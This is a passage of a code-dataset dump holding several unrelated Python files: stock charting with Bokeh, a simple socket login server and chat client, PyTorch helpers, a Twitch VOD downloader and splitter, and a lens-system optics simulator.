make_candlestick(ticker):\n \"\"\" Creates a candlestick graph based on a stock ticker\n :param ticker: str\n :return: Bokeh Plot\n \"\"\"\n df = df_date_change(ticker)\n inc = df['Adj. Close'] > df['Adj. Open']\n dec = df['Adj. Open'] > df['Adj. Close']\n source = ColumnDataSource(data=dict(\n x=df['Date'],\n y=df['Adj. High'],\n y1=df['Adj. Open'],\n y2=df['Adj. Low'],\n y3=df['Adj. Close'],\n Volume=df['Volume'],\n ))\n tools = 'pan,wheel_zoom,box_zoom,reset,save'\n hover = HoverTool(tooltips=[\n (\"Date\", \"@x{%F}\"),\n (\"Adj. High\", \"@y\"),\n (\"Adj. Open\", \"@y1\"),\n (\"Adj. Low\", \"@y2\"),\n (\"Adj. Close\", \"@y3\"),\n (\"Volume\", \"@Volume{0.00 a}\"),\n ], formatters={\n 'x': 'datetime',\n },\n mode='vline'\n )\n w = 12 * 60 * 60 * 1000\n p = figure(plot_width=1000, plot_height=400, x_axis_type=\"datetime\", tools=[hover, tools],\n active_scroll='wheel_zoom', active_drag='pan', title=\"{} Candlestick Graph\".format(ticker))\n\n p.xaxis.major_label_orientation = pi/4\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Price'\n p.segment(df.Date, df['Adj. High'], df.Date, df['Adj. Low'], color='black', source=source, line_width=0.5)\n p.vbar(df.Date[inc], w, df['Adj. Open'][inc], df['Adj. Close'][inc], fill_color=\"#D5E1DD\", line_color=\"black\",\n line_width=0.5)\n p.vbar(df.Date[dec], w, df['Adj. Open'][dec], df['Adj. Close'][dec], fill_color=\"#F2583E\", line_color=\"black\",\n line_width=0.5)\n p2 = volume_helper(ticker, hover, tools, source, p)\n return gridplot([p, p2], ncols=1)\n\n\ndef month_average(ticker):\n \"\"\"Creates a One-Month Average graph\n :param ticker: str\n :return: Bokeh Plot\n \"\"\"\n df = df_date_change(ticker)\n stock = np.array(df['Adj. 
Close']) # eventually make drop down menu for any\n stock_dates = np.array(df['Date'], dtype=np.datetime64)\n window_size = 30\n window = np.ones(window_size)/float(window_size)\n stock_avg = np.convolve(stock, window, 'same')\n source = ColumnDataSource(data=dict(\n x=stock_dates,\n y=stock,\n h=stock_avg,\n Volume=df['Volume'],\n ))\n tools = 'pan,wheel_zoom,box_zoom,reset,save'\n hover = HoverTool(tooltips=[\n (\"Date\", \"@x{%F}\"),\n (\"Price\", \"@y\"),\n (\"Volume\", \"@Volume{0.00 a}\")\n ], formatters={\n 'x': 'datetime',\n },\n mode='mouse'\n )\n p = figure(plot_width=1000, plot_height=400, x_axis_type='datetime', tools=[hover, tools],\n active_scroll='wheel_zoom', active_drag='pan', title='One Month Avg for {}'.format(ticker))\n p.grid.grid_line_alpha = 0.3\n p.xaxis.axis_label = 'Date'\n p.yaxis.axis_label = 'Price'\n p.ygrid.band_fill_color = 'olive'\n p.ygrid.band_fill_alpha = 0.1\n p.circle('x', 'y', size=4, legend='close', color='darkgrey', alpha=0.4, source=source)\n p.line('x', 'h', legend='avg', color='navy', source=source)\n p.legend.location = 'top_left'\n p2 = volume_helper(ticker, hover, tools, source, p)\n return gridplot([p, p2], ncols=1, merge_tools=True, match_aspect=True)\n","repo_name":"KieranHauser/Django-Bokeh-Stock-Plots","sub_path":"visualization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14404019189","text":"\"\"\"SERVIDOR\"\"\"\n\nimport socket\nfrom json import load\n\ndef create_socket():\n try:\n global host\n global port \n global s\n host = \"localhost\"\n port = 5500\n s = socket.socket() \n except socket.error as msg:\n print(\"Erro ao tentar criar o socket_LOGIN: \" + str(msg))\n\n\ndef bind_socket():\n try:\n global host\n global port\n global s\n\n print(\"Bind_LOGIN na porta: \" + str(port))\n\n s.bind((host, port))\n s.listen(1) \n except socket.error as msg:\n print(\"Erro ao dar bind_LOGIN: \" + str(msg))\n \n\ndef socket_accept():\n conn, address = s.accept()\n print(\"[LOGIN] Conexão realisada com sucesso\")\n print('IP: ' + str(address[0]) + ' | Port: ' + str(address[1]))\n login = conn.recv(1024).decode(\"utf-8\")\n typer_user = handle_login(login)\n\n if typer_user is not None:\n conn.send(str.encode(typer_user))\n else:\n conn.sendall(b'Erro')\n\n print('[LOGIN-HUB] Conexão encerrada')\n conn.close\n\n\ndef handle_login(login):\n with open('C:\\\\Users\\\\Nicol\\\\OneDrive\\\\Área de Trabalho\\\\sistDistr-trab-chamada\\\\sistema_distribuido_socket\\\\db_netuno.json', encoding='UTF-8') as db_data:\n login_members = load(db_data)\n \n for login_member in login_members['login_members']:\n if login == str(login_member['user'] + login_member['password']):\n return login_member['type_user']\n \n return None\n \n\n\ndef main():\n create_socket()\n bind_socket()\n socket_accept()\n\n\nmain()","repo_name":"LucasSouzaG/sistema_distribuido_socket","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"73237551684","text":"#coding=utf-8\nimport json\nimport os\nimport torch\nimport numpy as np\nimport random\n\ndef save_dataset(path, dataset):\n with open(path, 'w', encoding='utf-8') as f:\n json.dump(dataset, f, ensure_ascii=False, indent=2)\n\ndef read_dataset(path):\n f = open(path, 'r', encoding='utf-8')\n dataset = json.load(f)\n if 'data' in dataset:\n dataset = 
dataset['data']\n return dataset\n\ndef save_model(output_model_file, model, optimizer):\n os.makedirs(output_model_file, exist_ok=True)\n output_model_file += 'pytorch_model.bin'\n torch.save({\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict()\n }, output_model_file, _use_new_zipfile_serialization=False)\n\n\ndef set_seed(seed):\n os.environ['PYTHONHASHSEED'] = str(seed)\n torch.manual_seed(seed) # cpu\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) # gpu\n np.random.seed(seed)\n random.seed(seed)\n torch.backends.cudnn.deterministic = True # consistent results on the cpu and gpu\n","repo_name":"nju-websoft/AHDR-KnowledgeEnhanced","sub_path":"src/implicit/monoBERT/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22141016083","text":"import json\nfrom .TBA import TBA\nfrom .TOA import TOA\nfrom .splitter import Splitter\nimport twitch\nimport youtube_dl\nfrom . import mover\nfrom .email import Emailer\n# from .youtube import YouTube\n# yt = YouTube()\n\n\ndef timestamp_and_dl(id_of_vod, type_of_vod, filename):\n print(\"Downloading \" + filename)\n ydl_opts = {\n 'format': 'best',\n 'fixup': 'never',\n 'outtmpl': filename,\n }\n\n if type_of_vod == \"twitch\":\n twitch_client = twitch.TwitchClient(client_id='a57grsx9fi8ripztxn8zbxhnvek4cp')\n vodinf = twitch_client.videos.get_by_id(id_of_vod)\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([vodinf.get('url')])\n return vodinf.get('created_at').timestamp()\n else:\n return 0\n\n\ndef main(event_key, event_type, videos, email):\n for video in videos:\n video.update(timestamp=int(timestamp_and_dl(video.get('video_id'),\n video.get('video_type'),\n event_type + event_key + \"_\" + video.get('video_id') + \".mp4\")))\n if event_type == 'frc':\n TBA().DB_setup(event_key, videos, \"frc\")\n elif event_type == \"ftc\":\n toa = TOA()\n toa.DB_setup(event_key, videos, \"ftc\")\n # input(\"Press enter when ready to split\") # Debug line, please ignore\n Splitter.split(Splitter(), event_key, event_type)\n mover.Mover().move(event_key)\n Emailer().send_email(email, event_key)\n #if event_type == \"ftc\":\n # video_ids = yt.upload(event_key)\n # toa.link_clips(video_ids)\n\n\nif __name__ == '__main__':\n with open('process_me_next.json', 'r') as f:\n str_json = f.read()\n while \"}{\" in str_json:\n str_json = str_json.replace('}{', '},{')\n args = json.loads(str_json)\n main(args['event_key'],\n args['event_type'],\n args['videos'],\n args['email'])\n","repo_name":"tweirtx/ReMatch","sub_path":"ReMatch/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"15711235451","text":"import socket\nimport threading\nimport select\nimport time\n\nsoc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntime.sleep(50) \nresult = soc.connect((\"server\", 59001))\nsoc.setblocking(0)\nquit = False\nname = \"noname\"\n\ndef client_in():\n\tglobal quit\n\tglobal name\n\twhile True:\n\t\tclients_input = input(\"[{}]\\n\".format(name))\n\t\tif \"noname\" in name:\n\t\t\tname = clients_input\n\t\tclients_input += '\\n'\n\t\tif \"quit\" in clients_input:\n\t\t\tquit = True;\n\t\t\tbreak;\n\t\tsoc.send(clients_input.encode(\"utf8\")) # we must encode the string to bytes\n\t\ttime.sleep(1)\n\ndef client_out():\n\tglobal quit\n\twhile 
True:\n\t\tif quit:\n\t\t\tbreak;\n\t\tready = select.select([soc], [], [], 1)\n\t\tif ready[0]:\n\t\t\tresult_bytes = soc.recv(4096) # the number means how the response can be in bytes \n\t\t\tresult_string = result_bytes.decode(\"utf8\") # the return will be in bytes, so decode\n\t\t\tprint(result_string)\n\nif __name__ == \"__main__\":\n\tprint(\"Usage: appoint / delete / show / quit\\n\")\n\tinput_c = threading.Thread(target=client_in)\n\toutput_c = threading.Thread(target=client_out)\n\tinput_c.start()\n\toutput_c.start()\n\toutput_c.join()\n\tinput_c.join()\n\n\n\n\t\n","repo_name":"ISTNgit/TaskScheduler","sub_path":"Client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"112899275","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 05 10:22:12 2018\n\n@author: hajimetch\n\"\"\"\n\nfrom enum import Enum\nfrom datetime import datetime\nimport configparser\nimport math\nimport numpy as np\n\n#\n# Associate setting items with each string expression and number.\n#\n\n\nclass Projection(Enum):\n SPOT = 'spot'\n PATTERN = 'pattern'\n\n\nclass Reflector(Enum):\n TRUE = 'true'\n FALSE = 'false'\n\n\nclass Telephoto(Enum):\n TRUE = 'true'\n FALSE = 'false'\n\n\nclass InputDataType(Enum):\n SURFACE = 'surface data'\n POWER = 'power data'\n POWER_LIGHT = 'power and light data'\n GROUP = 'group data'\n\n\nclass TracingNumber(Enum):\n SINGLE = 'single'\n MULTI = 'multi'\n\n\nclass IntervalAdjustment(Enum):\n NONE = 'none'\n FOCAL_LENGTH = 'specify focal length'\n FOCAL_POSITION = 'specify focal position'\n TELEPHOTO_POWER_0 = 'telephoto system power set to 0'\n FOCAL_POSITION_LENGTH = 'specify focal position and length'\n FOCAL_POSITION_SEPARATED = 'specify focal position of separated system'\n\n\nclass ObjectDistance(Enum):\n INFINITY = 'to infinity'\n FIRST_POWER = 'to first power'\n FIRST_SURFACE = 'to first surface'\n PRINCIPAL_POSITION = 'to principal position of projection side'\n\n\nclass IncidentLightRange(Enum):\n SYSTEM_SOURCE = 'by system and light source'\n APERTURE_IRIS_SOURCE = 'by lens aperture iris and light source'\n APERTURE_IRIS = 'by lens aperture and iris'\n\n\nclass TracingDirection(Enum):\n SCREEN_TO_APERTURE = 'screen to aperture'\n SCREEN_TO_APERTURE_EXT = 'screen to aperture extended'\n SOURCE_TO_APERTURE = 'light source to aperture'\n SOURCE_TO_APERTURE_EXT = 'light source to aperture extended'\n\n\nclass SplitPattern(Enum):\n NONE = 'none'\n FIRST_INTERVAL = 'first power and interval'\n LAST_INTERVAL = 'last power and interval'\n RATIO_INTERVAL = 'power ratio and interval'\n FIRST_LAST = 'first and last powers'\n\n\nclass PTLCSpecification(Enum):\n NONE = 'none'\n FRONT = 'front'\n BACK = 'back'\n FRONT_OVER_BACK = 'front/back'\n BACK_OVER_FRONT = 'back/front'\n\n\nclass ScreenDisplayDimension(Enum):\n XYPLANE_COORDINATES = 'XY-plane and ray passing point coordinates'\n XYPLANE_3D = 'XY-plane and 3D'\n XYPLANE_XZPLANE = 'XY-plane and XZ-plane'\n SPLIT = 'split view'\n\n\nclass KindOfLens(Enum):\n SINGLE_LENS = 'single lens'\n COMBINED_LENS_FRONT = 'combined lens front'\n COMBINED_LENS_BACK = 'combined lens back'\n IRIS = 'iris'\n LS_REFLECTOR = 'light source reflector'\n REFLECTOR = 'reflector'\n APERTURE = 'aperture'\n LIGHT_SOURCE = 'light source'\n\n\nclass ProgramOperation(Enum):\n END = 1\n NEW = 2\n READ = 3\n COPY = 4\n\n\nclass ProgramFunction(Enum):\n REFLECTOR_DISTRIBUTION = 8\n REFLECTOR_AVERAGE = 9\n\n\nclass 
Direction(Enum):\n FORWARD = 1\n BACKWARD = -1\n\n\nclass OpticalSystem():\n def __init__(self, config):\n self.start_dt = datetime.now()\n\n self.read_and_check_data(config)\n\n self.prepare_lens_eff_rad(config)\n self.prepare_ptlc(config)\n self.prepare_axis_and_asph(config)\n self.prepare_glass_and_rindex(config)\n\n if self.input_dtype == InputDataType.SURFACE:\n self.process_surf(config)\n elif self.input_dtype == InputDataType.POWER:\n self.process_pow(config)\n elif self.input_dtype == InputDataType.POWER_LIGHT:\n self.process_pow_lit(config)\n elif self.input_dtype == InputDataType.GROUP:\n self.process_grp(config)\n\n self.determine_vals()\n\n self.determine_kind_of_lens()\n\n self.set_obj_dist()\n\n self.calculate_inv()\n\n self.adjust_lens_pos()\n\n def read_and_check_data(self, config):\n \"\"\"\n configで指定されたデータファイルから、光学系のデータを読み込む\n 対応するBASICコード:*IN1 など\n \"\"\"\n self.projection = Projection(\n config.get('Parameters', 'projection', fallback='spot'))\n self.telephoto = Telephoto(\n config.get('System', 'telephoto', fallback='false'))\n self.reflector = Reflector(\n config.get('System', 'reflector', fallback='false'))\n self.scale = config.getfloat('System', 'scale', fallback=100)\n self.input_dtype = InputDataType(\n config.get('System', 'input data type', fallback='surface data'))\n self.tracing_no = TracingNumber(\n config.get('System', 'tracing number', fallback='single'))\n self.inr_adj = IntervalAdjustment(\n config.get('System', 'interval adjustment', fallback='none'))\n self.obj_dist_spc = ObjectDistance(\n config.get(\n 'Parameters',\n 'object distance spcification',\n fallback='to infinity'))\n self.incident_lit_range = IncidentLightRange(\n config.get(\n 'Parameters',\n 'incident light range definition',\n fallback='by system and light source'))\n self.tracing_dir = TracingDirection(\n config.get(\n 'Parameters',\n 'tracing direction',\n fallback='screen to aperture'))\n\n self.system_name = config.get('System', 'system name', fallback='')\n self.no_pows = config.getint('System', 'number of powers', fallback=0)\n self.no_surfs = config.getint(\n 'System', 'number of surfaces', fallback=0)\n self.no_lenses = config.getint(\n 'System', 'number of lenses', fallback=0)\n self.no_grps = config.getint(\n 'System', 'number of groups', fallback=self.no_pows)\n self.adj_pow_inr = config.getint(\n 'System', 'adjusting power interval number', fallback=0)\n self.adj_surf_inr = config.getint(\n 'System', 'adjusting surface interval number', fallback=0)\n self.adj_surf_inr_b = config.getint(\n 'System', 'adjusting interval number behind', fallback=0)\n self.focal_pos = config.getfloat(\n 'System', 'focal position', fallback=0) / self.scale\n self.focal_len = config.getfloat(\n 'System', 'focal length', fallback=0) / self.scale\n self.iris_pos = config.getfloat(\n 'System', 'iris position', fallback=0) / self.scale\n self.fixed_lens_pos = config.getfloat(\n 'System', 'fixed lens position', fallback=0) / self.scale\n self.ap_rad = config.getfloat(\n 'System', 'aperture radius', fallback=0) / self.scale\n self.ls_rad = config.getfloat(\n 'System', 'light source radius', fallback=0) / self.scale\n self.obj_dist_real = config.getfloat(\n 'System', 'object distance', fallback=0) / self.scale\n self.ap_to_ls = config.getfloat(\n 'System', 'aperture to light source', fallback=0) / self.scale\n self.mirror_to_valve = config.getfloat(\n 'System', 'mirror to valve', fallback=0) / self.scale\n\n self.tel_no_pows = config.getint(\n 'Telephoto', 'number of powers', fallback=0)\n 
self.tel_no_surfs = config.getint(\n 'Telephoto', 'number of surfaces', fallback=0)\n self.tel_system_pos = config.getfloat(\n 'Telephoto', 'system position', fallback=0) / self.scale\n self.tel_system_dist = config.getfloat(\n 'Telephoto', 'distance between systems', fallback=0) / self.scale\n self.tel_focal_len = config.getfloat(\n 'Telephoto', 'focal length', fallback=0) / self.scale\n self.tel_prin_pos_obj = config.getfloat(\n 'Telephoto', 'principal position of object side',\n fallback=0) / self.scale + self.tel_system_dist\n self.tel_prin_pos_prj = config.getfloat(\n 'Telephoto', 'principal position of projection side',\n fallback=0) / self.scale + self.tel_system_dist\n self.tel_ap_disp = config.getfloat(\n 'Telephoto', 'aperture for display', fallback=0) / self.scale\n self.tel_ri_prj = config.getfloat(\n 'Telephoto', 'refractive index of projection region', fallback=0)\n self.tel_adj_inr = config.getint(\n 'Telephoto', 'adjusting interval number', fallback=0)\n self.ls_file = config.get(\n 'Light Source', 'light source file', fallback='')\n self.ls_diff_rad = config.getfloat(\n 'Light Source', 'diffusion radius', fallback=0) / self.scale\n self.ls_no_filamets = config.getint(\n 'Light Source', 'number of filaments', fallback=0)\n self.ls_filament_pos = config.getfloat(\n 'Light Source', 'filament position', fallback=0) / self.scale\n self.ls_filament_len = config.getint(\n 'Light Source', 'filament length', fallback=0) / self.scale\n self.ls_no_segments = config.getint(\n 'Light Source', 'number of aperture segments', fallback=0)\n self.ls_angle_range = config.getfloat(\n 'Light Source', 'angle range', fallback=0) / self.scale\n self.ls_no_rays = config.getint(\n 'Light Source', 'number of tracing rays', fallback=0)\n self.ls_iris_no = config.getint(\n 'Light Source', 'iris surface number', fallback=0)\n self.ls_limit_no = config.getint(\n 'Light Source', 'limit surface number', fallback=0)\n \"\"\"\n リストを初期化する\n 対応するBASICコード:*IN4\n \"\"\"\n global GLASS_DATA\n no_rindex = self.no_surfs + 4 if (\n self.telephoto == Telephoto.TRUE) else self.no_surfs + 2\n self.surfs_of_pow = [0] * (self.no_pows + 1)\n self.lens_rad = [0] * (self.no_lenses + 1)\n self.surf_inr_of_pow = [0] * (self.no_surfs + 1)\n self.div_ratio = [0] * self.no_pows\n self.split_param1 = [0] * self.no_grps\n self.split_param2 = [0] * self.no_grps\n self.lens_eff_rad = [0] * (self.no_lenses * 2 + 4)\n self.ptlc_spc = [PTLCSpecification.NONE] * (self.no_lenses + 1)\n self.ptlc_val = [0] * (self.no_lenses + 1)\n self.axis_ratio = [0] * (self.no_surfs + 1)\n self.asph_coeff = [[]] * self.no_surfs\n self.glass = [GLASS_DATA['AIR']] * (self.no_surfs + 1)\n self.direction = [Direction.FORWARD] * (self.no_surfs + 1)\n self.dispersion = [GLASS_DATA['AIR']['dispersion']] * (\n self.no_surfs + 1)\n self.rindex_sgd = [GLASS_DATA['AIR']['nd']] * (self.no_surfs + 1)\n self.rindex = [GLASS_DATA['AIR']['nd']] * no_rindex\n self.rindex_diff = [0] * no_rindex\n self.surf_inr = [0] * (self.no_surfs + 2)\n self.surf_roc = [0] * (self.no_surfs + 1)\n self.pow_inr = [0] * (self.no_pows + 2)\n self.pow_val = [0] * (self.no_pows + 2)\n self.grp_inr = [0] * (self.no_grps + 1)\n self.lit_hgt_at_pow = [0] * (self.no_pows + 2)\n self.lit_hgt_at_grp = [0] * (self.no_grps + 1)\n self.split_pattern = [SplitPattern.NONE] * self.no_grps\n self.lens_index = [0] * (self.no_surfs + 1)\n self.surf_eff_rad = [0] * (self.no_surfs + 1)\n self.kind_of_lens = [KindOfLens.SINGLE_LENS] * (self.no_lenses + 2)\n \"\"\"\n リスト形式のデータを読み込む\n 対応するBASICコード:*IN6\n 
\"\"\"\n surfs_of_pow = get_intlist(config, 'System', 'surfaces of powers')\n lens_rad = get_floatlist(config, 'System', 'lens radius')\n surf_inr_of_pow = get_floatlist(config, 'System',\n 'surface intervals of powers')\n div_ratio = get_floatlist(config, 'System',\n 'division ratios of powers')\n split_param1 = get_floatlist(config, 'System',\n 'split parameters first')\n split_param2 = get_floatlist(config, 'System',\n 'split parameters second')\n\n self.surfs_of_pow = overwrite(self.surfs_of_pow, surfs_of_pow)\n self.lens_rad = overwrite(self.lens_rad, lens_rad)\n self.surf_inr_of_pow = overwrite(self.surf_inr_of_pow, surf_inr_of_pow)\n self.div_ratio = overwrite(self.div_ratio, div_ratio)\n self.split_param1 = overwrite(self.split_param1, split_param1)\n self.split_param2 = overwrite(self.split_param2, split_param2)\n\n self.obj_dist_lst = get_floatlist(config, 'System',\n 'object distance list')\n self.dist_index = 0\n \"\"\"\n データの整合性を確認する\n \"\"\"\n if (self.telephoto == Telephoto.FALSE and\n self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0):\n raise DataConsistenceError(\n '[System: telephoto] is \"false\"' +\n ' though [System: interval adjustment] is' +\n ' \"telephoto system power set to 0\".')\n\n if (surfs_of_pow and self.input_dtype == InputDataType.SURFACE and\n self.inr_adj == IntervalAdjustment.NONE):\n raise DataConsistenceError(\n '[System: surface intervals of powers] is not void' +\n ' though [System: input data type] is' +\n ' \"surface\" and [System: interval adjustment] is \"none\".')\n\n if (not self.obj_dist_lst and\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED):\n raise DataConsistenceError(\n '[System: object distance list] is void'\n ' though [System: interval adjustment] is' +\n ' \"specify focal position of separated system\".')\n\n def prepare_lens_eff_rad(self, config):\n \"\"\"\n configで指定されたデータファイルのlens effective radiusの項目を展開して\n lens_eff_radリストを構成する\n 対応するBASICコード:*IN6\n \"\"\"\n lens_eff_rad_data = get_floatlist(config, 'System',\n 'lens effective radius')\n lens_eff_rad_dict = {\n i: {\n 'front': j,\n 'back': k\n }\n for i, j, k in zip(* [iter(lens_eff_rad_data)] * 3)\n }\n lens_eff_rad = []\n for lens_no in range(self.no_lenses):\n if lens_no not in lens_eff_rad_dict:\n lens_eff_rad.append(self.lens_rad[lens_no])\n lens_eff_rad.append(self.lens_rad[lens_no])\n else:\n if (0 < lens_eff_rad_dict[lens_no]['front'] and\n lens_eff_rad_dict[lens_no]['front'] <\n self.lens_rad[lens_no]):\n lens_eff_rad.append(lens_eff_rad_dict[lens_no]['front'])\n else:\n lens_eff_rad.append(self.lens_rad[lens_no])\n if (0 < lens_eff_rad_dict[lens_no]['back'] and\n lens_eff_rad_dict[lens_no]['back'] <\n self.lens_rad[lens_no]):\n lens_eff_rad.append(lens_eff_rad_dict[lens_no]['back'])\n else:\n lens_eff_rad.append(self.lens_rad[lens_no])\n self.lens_eff_rad = overwrite(self.lens_eff_rad, lens_eff_rad)\n\n def prepare_ptlc(self, config):\n \"\"\"\n configで指定されたデータファイルのpower to lens curvature specificationsの項目を展開して\n ptlc_spcリストとptlc_valリストを構成する\n 対応するBASICコード:*IN6\n \"\"\"\n ptlc_spc = [\n PTLCSpecification(e)\n for e in get_stringlist(config, 'System',\n 'power to lens curvature specifications')\n ]\n ptlc_val = get_floatlist(config, 'System', 'power to lens values')\n self.ptlc_spc = overwrite(self.ptlc_spc, ptlc_spc)\n self.ptlc_val = overwrite(self.ptlc_val, ptlc_val)\n\n def prepare_axis_and_asph(self, config):\n \"\"\"\n configで指定されたデータファイルのsurfaces axis length ratiosと\n surfaces aspheric coefficientsの項目を読み込み、\n axis_ratioリストとasph_coeffリストを構成する\n 
対応するBASICコード:*IN6\n \"\"\"\n surf_axis_data = get_floatlist(config, 'System',\n 'surface axis length ratios')\n surf_axis_dict = dict(zip(* [iter(surf_axis_data)] * 2))\n surf_asph_data = get_floatlist(config, 'System',\n 'surfaces aspheric coefficients')\n axis_ratio = []\n asph_coeff = []\n asph_no = 0\n for surf_no in range(self.no_surfs):\n if surf_no not in surf_axis_dict:\n axis_ratio.append(1)\n asph_coeff.append([])\n else:\n axis_ratio.append(surf_axis_dict[surf_no])\n if surf_axis_dict[surf_no] >= 0:\n asph_coeff.append([])\n else:\n asph_coeff_element = []\n for index in range(4):\n asph_coeff_element.append(\n surf_asph_data[asph_no * 4 + index] *\n (self.scale / 100)**(index * 2 + 1))\n asph_coeff.append(asph_coeff_element)\n asph_no += 1\n self.axis_ratio = overwrite(self.axis_ratio, axis_ratio)\n self.asph_coeff = overwrite(self.asph_coeff, asph_coeff)\n\n def prepare_glass_and_rindex(self, config):\n \"\"\"\n 予め用意されたGLASS_DATAおよび\n configで指定されたデータファイルのglass type namesの項目をもとに\n 光学系を定める以下の各リストを構成する\n glass, direction, dispersion, rindex, rindex_sgd, rindex_diff\n 対応するBASICコード:*IN6\n \"\"\"\n global GLASS_DATA\n v_dr = 1\n v_b = 0\n glass = []\n direction = []\n dispersion = []\n rindex = []\n rindex_sgd = []\n rindex_diff = []\n for glass_name in get_stringlist(config, 'System', 'glass type names'):\n glass_name = 'AIR' if glass_name == '' else glass_name\n if glass_name == 'REF':\n v_dr = -v_dr\n if glass_name not in GLASS_DATA:\n raise NoGlassDataError(glass_name +\n ' is not found in GLASS_DATA')\n glass.append(GLASS_DATA[glass_name])\n direction.append(Direction(v_dr))\n dispersion.append(GLASS_DATA[glass_name]['dispersion'])\n rindex.append(GLASS_DATA[glass_name]['nd'])\n v_q = v_dr * GLASS_DATA[glass_name]['nd']\n rindex_sgd.append(v_q)\n if v_b != 0:\n rindex_diff.append(v_q - v_b)\n v_b = v_q\n self.glass = overwrite(self.glass, glass)\n self.direction = overwrite(self.direction, direction)\n self.dispersion = overwrite(self.dispersion, dispersion)\n self.rindex_sgd = overwrite(self.rindex_sgd, rindex_sgd)\n self.rindex = overwrite(self.rindex, rindex)\n self.rindex_diff = overwrite(self.rindex_diff, rindex_diff)\n self.rindex_sgd_0 = self.rindex_sgd[0]\n self.rindex_sgd_end = self.rindex_sgd[self.no_surfs]\n self.rindex_sgd_prj = self.rindex_sgd_end\n self.focal_len_index = self.rindex_sgd_prj * rev(self.focal_len)\n\n def process_surf(self, config):\n \"\"\"\n configで指定されたデータファイルのsurface dataの項目から\n surf_inrリストとsurf_rocリストを読み込む\n 対応するBASICコード:*IN6, *IN4\n \"\"\"\n surf_data = get_floatlist(config, 'System', 'surface data')\n self.surf_inr = overwrite(self.surf_inr, surf_data[::2])\n self.surf_roc = overwrite(self.surf_roc, surf_data[1::2])\n\n def process_pow(self, config):\n \"\"\"\n configで指定されたデータファイルのpower dataの項目から\n pow_inrリストとpow_valリストを読み込む\n 対応するBASICコード:*IN6, *IN4\n \"\"\"\n pow_data = get_floatlist(config, 'System', 'power data')\n self.pow_inr = overwrite(self.pow_inr, pow_data[::2])\n self.pow_val = overwrite(self.pow_val, pow_data[1::2])\n self.pow_inr_0 = self.pow_inr[0]\n\n def process_pow_lit(self, config):\n \"\"\"\n configで指定されたデータファイルのpower and light dataの項目から\n lit_hgt_at_powリストとpow_inrリストを読み込み、\n pow_valリストの値を計算する\n 対応するBASICコード:*IN6, *IN4, *EF2\n \"\"\"\n pow_lit_data = get_floatlist(config, 'System', 'power and light data')\n self.lit_hgt_at_pow = overwrite(self.lit_hgt_at_pow, pow_lit_data[::2])\n self.pow_inr = overwrite(self.pow_inr, pow_lit_data[1::2])\n surf_no = 0\n pow_val = []\n for pow_no in range(self.no_pows):\n if 
(self.rindex_diff[surf_no] == 0 and\n self.surfs_of_pow[pow_no] == 1 or\n self.pow_inr[pow_no] == 0):\n pow_val.append(0)\n else:\n pow_val.append(\n ((self.lit_hgt_at_pow[pow_no +\n 1] - self.lit_hgt_at_pow[pow_no + 2]\n ) * rev(self.pow_inr[pow_no + 1]) -\n (self.lit_hgt_at_pow[pow_no] - self.\n lit_hgt_at_pow[pow_no + 1]) * rev(self.pow_inr[pow_no]))\n / self.lit_hgt_at_pow[pow_no + 1])\n surf_no += self.surfs_of_pow[pow_no]\n self.pow_val = overwrite(self.pow_val, pow_val)\n self.pow_inr_0 = self.pow_inr[0]\n\n def process_grp(self, config):\n \"\"\"\n configで指定されたデータファイルのgroup dataの項目から\n lit_hgt_at_grpリストとgrp_inrリストを読み込み、\n split patternsの項目から\n split_patternリストを読み込む。\n grp_valリストとpow_inrリストとpow_valリストを計算する\n 対応するBASICコード:*IN6, *EF3\n \"\"\"\n grp_data = get_floatlist(config, 'System', 'group data')\n self.lit_hgt_at_grp = overwrite(self.lit_hgt_at_grp, grp_data[::2])\n self.grp_inr = overwrite(self.grp_inr, grp_data[1::2])\n split_pattern = [\n SplitPattern(e)\n for e in get_stringlist(config, 'System', 'split patterns')\n ]\n self.split_pattern = overwrite(self.split_pattern, split_pattern)\n\n # lit_hgt_at_grpおよびgrp_inrからgrp_valを計算\n surf_no = 0\n pow_no = 0\n grp_val = []\n for grp_no in range(self.no_grps):\n if (self.split_pattern[grp_no] == SplitPattern.NONE and\n self.rindex_diff[surf_no] == 0 and\n self.surfs_of_pow[pow_no] == 1 or self.grp_inr == 0):\n grp_val.append(0)\n else:\n grp_val.append(\n ((self.lit_hgt_at_grp[grp_no +\n 1] - self.lit_hgt_at_grp[grp_no + 2]\n ) * rev(self.grp_inr[grp_no + 1]) -\n (self.lit_hgt_at_grp[grp_no] - self.\n lit_hgt_at_grp[grp_no + 1]) * rev(self.grp_inr[grp_no]))\n / self.lit_hgt_at_grp[grp_no + 1])\n pow_no += 1\n surf_no += self.surfs_of_pow[pow_no]\n if self.split_pattern[grp_no] != SplitPattern.NONE:\n pow_no += 1\n surf_no += self.surfs_of_pow[pow_no]\n self.grp_val = overwrite(self.grp_val, grp_val)\n\n # grp_inrおよびgrp_valからpow_inrとpow_valへ変換\n pow_no = 0\n delta = 0\n pow_inr = []\n pow_val = []\n for grp_no in range(self.no_grps):\n if self.split_pattern[grp_no] == SplitPattern.NONE:\n pow_inr.append(self.grp_inr[grp_no] - delta)\n pow_val.append(self.grp_val[grp_no])\n delta = 0\n pow_no += 1\n else:\n v_u = self.split_param1[grp_no]\n v_v = 